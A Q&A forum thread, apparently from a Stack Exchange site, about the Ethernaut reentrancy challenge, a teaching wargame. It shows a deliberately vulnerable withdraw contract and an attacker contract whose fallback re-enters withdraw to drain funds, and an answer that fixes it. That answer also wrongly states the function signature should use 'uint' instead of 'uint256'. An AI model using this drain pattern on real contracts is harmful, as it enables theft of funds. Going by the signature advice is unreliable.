# Reentrancy attack implementation

Tags: ethereum, solidity, reentrancy

I'm trying to solve the [reentrancy attack ethernaut challenge](https://ethernaut.openzeppelin.com/level/0x573eAaf1C1c2521e671534FAA525fAAf0894eCEb).
Here is the solidity code for the target contract:

```
pragma solidity ^0.8.0;

import 'https://github.com/OpenZeppelin/openzeppelin-contracts/blob/master/contracts/utils/math/SafeMath.sol';

contract Reentrance {
  
    using SafeMath for uint256;
    mapping(address => uint) public balances;

    function donate(address _to) public payable {
    balances[_to] = balances[_to].add(msg.value);
    }

    function balanceOf(address _who) public view returns (uint balance) {
        return balances[_who];
    }
 
    function withdraw(uint _amount) public {
        if(balances[msg.sender] >= _amount) {
            (bool result,) = msg.sender.call{value:_amount}("");
        if(result) {
            _amount;
    }
        balances[msg.sender] -= _amount;
    }
}

    receive() external payable {}
}
```

My plan is to:

1. Donate to the Reentrance contract from another contract.
2. Call the withdraw function from inside a function in the contract I created as well as from the fallback function in my contract. The goal is to execute

```
(bool result,) = msg.sender.call{value:_amount}("");
```

enough times to empty the Reentrance contract's balance while skipping the code underneath.

Here's what my contract looks like:

```
contract interactor{
    address public target=0xd9145CCE52D386f254917e481eB44e9943F39138;
    uint32 public i = 0;
    constructor() payable {}
    function calldonate(address _to,uint val) public payable
    {
        target.call{value:val}(abi.encodeWithSignature("donate(address)", _to));
    }
    function callwithdraw() public 
    {
        target.call(abi.encodeWithSignature("withdraw(uint256)", 1));
    }
    fallback() external payable {
        i++;
        require(i<target.balance);
        msg.sender.call(abi.encodeWithSignature("withdraw(uint256)", 1));
    }
}
```

After deploying the two contracts in Remix, I'm unable to empty the Reentrance contract's balance. The variable i never reaches target.balance-1.
I can't see what's wrong with my code (very new to Solidity).
Any help would be appreciated.

Answer (score 0):

a few changes in your Interactor contract

1-

Instead of hardcoded target address, pass it in constructor. so deploy the `Reentrance` in case you need to have clean state variables

```
address public target;
    uint32 public i = 0;
    constructor(address _target) payable {
        target=_target;
    }
```

2- In `calldonate` function I added `require` for debuggin

```
     bytes memory payload=abi.encodeWithSignature("donate(address)",_to);
    (bool success,)=target.call{value:val}(payload);
     // just for debugging purpose
    require(success,"target.call failed");
```

3- call `calldonate` function. send 10 wei, since you are withdrawing 1 wei, otherwise Remix will crust. I think `to` address must be the `interceptor` address itself. since in `Reentract` contract, `balances` mapping is updated with the `msg.value` you have to enter amount in the value as in the image

[image]

successfully sent 10 wei, balance is updated

4- you have to update the `fallback` function. `.call` method did not work I think that is because of `call` is a safe function. (or I had some bugs). so I updated the fallback

```
fallback() external payable {
    i++;
    require(i<target.balance,"error here");
    // msg.sender.call(abi.encodeWithSignature("withdraw(uint)",1));
    // target.call(abi.encodeWithSignature("withdraw(uint)",1));
    Reentrance(payable(target)).withdraw(1);
}
```

5- `callwithdraw` function signature should be updated. `Reentrance` contract passes `uint` but you are `uint256`

```
 function callwithdraw() public 
    {
        target.call(abi.encodeWithSignature("withdraw(uint)",1));
    }
```

6- call `callwithdraw` function. Because you have this logic inside `fallback`

```
    // when i=5, targetBalance would be 5
    i++;
    require(i<target.balance);
```

after you called it and check the balances you should see 5 left.

[image]